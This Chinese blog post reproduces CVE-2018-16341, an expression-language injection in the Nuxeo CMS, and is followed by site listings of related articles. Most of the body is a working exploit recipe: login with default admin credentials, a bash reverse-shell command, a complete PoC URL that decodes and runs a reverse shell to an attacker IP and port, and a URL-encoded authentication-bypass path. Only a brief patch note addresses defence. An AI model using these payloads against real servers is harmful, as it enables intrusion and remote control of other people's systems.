Nuxeo认证绕过和RCE漏洞(CVE-2018-16341)

最新推荐文章于 2024-07-15 16:27:13 发布
最新推荐文章于 2024-07-15 16:27:13 发布
阅读量437 收藏 10
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135360384
版权

漏洞描述:

Nuxeo Platform是一款跨平台开源的企业级内容管理系统(CMS)。

nuxeo-jsf-ui组件处理facelet模板不当,当访问的facelet模板不存在时,相关的文件名会输出到错误页面上,而错误页面会当成模板被解析,文件名包含表达式也会被输出同时被解析执行,从而导致远程代码执行漏洞。

复现过程:

1.访问ip:port

2.使用默认密码登陆Administrator/Administrator。

在登陆状态下访问test${11*11}.xhtml,可以看到表达式被执行

3.反弹shell

3.1 本地监听

3.2 bash反弹shell的命令

bash -i >& /dev/tcp/ip/port 0>&1

3.3 base64编码

3.4 poc构造,成功监听

http://ip:port/nuxeo/login.jsp/${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTIxLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}",null).waitFor()}.xhtml

如此即可目标虚拟终端控制权限,实现相关操作

4.登录认证绕过

login.jsp/%24%7b%31%31%2a%31%31%7d.xhtml

如此可以绕过登录阶段,获取网站信息

修复建议:

1.补丁

https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

这是通过过滤的方式修复的,在getInputStream中,只有当路径中不包含”#”和”$”时才会把路径输出到输入流中,这样就无法执行EL了。

慕筱蚺
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-16341nuxeo远程代码执行漏洞
liuxiaoning_的博客
09-20 279
复现并分析【CVE-2018-16341nuxeo远程代码执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞,利用exp获取shell。
Nuxeo 认证绕过RCE漏洞分析(CVE-2018-16341)
weixin_30700977的博客
12-26 432
简介 Nuxeo Platform是一款跨平台开源的企业级内容管理系统(CMS)。nuxeo-jsf-ui组件处理facelet模板不当,当访问的facelet模板不存在时,相关的文件名会输出到错误页面上,而错误页面会当成模板被解析,文件名包含表达式也会被输出同时被解析执行,从而导致远程代码执行漏洞。在漏洞挖掘过程中发现nuxeo-jsf组件默认在10.2没有安装,历史版本是默认就安装的。可以通...
内容管理系统 Nuxeo认证绕过RCE漏洞CVE-2018-16341) 分析
whatday的专栏
09-01 736
目录 简介 影响范围 漏洞复现 执行系统命令 认证绕过 认证绕过分析 RCE 分析 补丁分析 参考链接 简介 Nuxeo Platform是一款跨平台开源的企业级内容管理系统(CMS)。 nuxeo-jsf-ui组件处理facelet模板不当,当访问的facelet模板不存在时,相关的文件名会输出到错误页面上,而错误页面会当成模板被解析,文件名包含表达式也会被输出同时被解析执行,从而导致远程代码执行漏洞。 在漏洞挖掘过程中发现nuxeo-jsf组件默认在10.2没有安装,历史版本是
nuxeo-web-ui:新的Nuxeo Web UI
02-06
Nuxeo Web UI 关于 Nuxeo Web UI是Nuxeo平台的标准基础Web应用程序。 它是高度可定制和可扩展的,是通过并利用我们的自定义元素库开发的。 安装依赖项 npm install 注意:此版本的Nuxeo Web UI要求节点版本> = ...
nuxeo-elements:Nuxeo Web组件
02-06
关于新元素Nuxeo Elements帮助开发人员使用使用Nuxeo构建自定义元素和Web应用程序。 它建立在顶部。依存关系要安装项目的依赖项: npm installnpm run bootstrap注意:此版本的Nuxeo Elements要求节点版本> = 10.23....
nuxeo-ui-elements:UI Web组件库
02-06
:police_car_light: 移至 :... Nuxeo平台和产品将强大的应用程序开发环境与基于SaaS的工具和模块化体系结构相结合,为Verizon,Electronic Arts,Sharp,FICO,US Navy和Boeing等一些最知名的品牌提供了清晰的商业价值
nuxeo-dataviz-elements:Nuxeo数据可视化Web组件
02-06
:police_car_light: 移至 :police_car_light: 所述库被移到了的的文件夹库,将其转化成... Nuxeo平台和产品将强大的应用程序开发环境与基于SaaS的工具和模块化体系结构相结合,为Verizon,Electronic Arts,Sharp,
nuxeo-drive:Nuxeo平台的跨平台桌面同步客户端
03-05
Nuxeo平台的nuxeo-drive服务器插件; 和用户计算机上的桌面客户端。 桌面客户端 可以从“主页” >“ Nuxeo驱动器”选项卡或从下载桌面客户端。 始终可以在这些静态URL上找到最新的官方发行版: 配置和用法 常规...
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1314
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
AI安全系列——[第五空间 2022]AI(持续更新)
最新发布
2201_76139143的博客
07-15 727
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 381
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 749
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络安全威胁情报到底是什么
学-> 思->用
07-10 526
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 479
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
非法闯入智能监测摄像机:安全守护的新利器
bova2022的博客
07-15 244
首先,它能够智能分析画面中的人物和物体,通过对比数据库识别可疑目标,自动过滤正常活动,减少误报。此外,很多智能摄像机支持远程监控,用户可以随时通过手机或电脑查看实时画面,确保安全无死角。在商业环境中,摄像机可以有效防止盗窃和破坏,提升商业安全防范水平。总之,非法闯入智能监测摄像机作为现代安防技术的重要组成部分,以其智能、高效的特性,正不断提升人们的安全感。随着技术的持续发展和应用场景的扩大,未来这些摄像机将在保护人们生命和财产安全方面发挥更加重要的作用,为我们的生活带来更多保障。
移动应用安全需求分析与安全保护工程
weixin_48579910的博客
07-12 1117
移动应用安全面临许多威胁,包括数据泄露、恶意软件、应用漏洞、不安全的网络通信和数据存储等。通过实施数据保护、安全编码、网络通信安全、应用加固、权限管理、安全更新和用户教育等措施,可以有效地提高移动应用的安全性,保护用户数据和隐私。综合采用安全开发生命周期(SDL)和持续安全监控与响应策略,确保移动应用在整个生命周期内的安全性。Android系统通过一系列系统级、应用级和用户级的安全机制,提供了全面的保护。应用沙盒、权限模型、SELinux、数据加密、应用签名、代码混淆等措施,有效地防止了多种安全威胁。
萝卜快跑:隐私与安全并重的无人驾驶之旅
Abooking的博客
07-12 293
同时,对于自动驾驶技术的测试与监管而言,监控摄像头也是不可或缺的一环,它们能够实时记录车辆行驶状态,为技术改进和法规制定提供宝贵的数据支持。在武汉,萝卜快跑被亲切地称为“苕萝卜”(笨萝卜),这一昵称背后,既是对其无人驾驶特性的幽默解读,也隐含了对复杂路况下车辆表现的期待与挑战。然而,随着技术的进步和应用的深入,如何平衡乘客隐私与行车安全,成为了摆在萝卜快跑面前的一道必答题。未来,随着无人驾驶技术的不断成熟和完善,我们有理由相信,萝卜快跑将为我们带来更加智能、安全、人性化的出行体验。
富格林:曝光纠正安全交易误区
fgl100的博客
07-11 518
因此,贵金属并非完全无风险,投资者仍需注意市场风险。投资者应该理解贵金属市场的复杂性,并将其视为投资组合的一部分,而不是绝对安全的避险资产。同时,通过合理的资产配置和风险管理策略,可以降低贵金属投资的风险。尽管黄金是最受欢迎的贵金属之一,但其他贵金属,如白银、铂金和钯金,同样具有投资潜力。忽视了其他贵金属的投资机会会导致投资组合的单一化,增加了风险。投资者应该考虑将不同类型的贵金属组合在其投资组合中,以实现更好的风险分散和收益潜力。通过选择不同贵金属之间的相关性较低的品种,可以降低整体投资组合的风险。
nx二次开发选中树列表数据
12-08
nx(或者称作Nuxeo)是一个开源的企业内容管理平台,提供了许多可以通过二次开发进行定制的功能。在nx中选中树列表数据通常有以下几个步骤: 首先,需要在nx平台上创建一个树列表组件,通过nx的开发文档或者官方...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值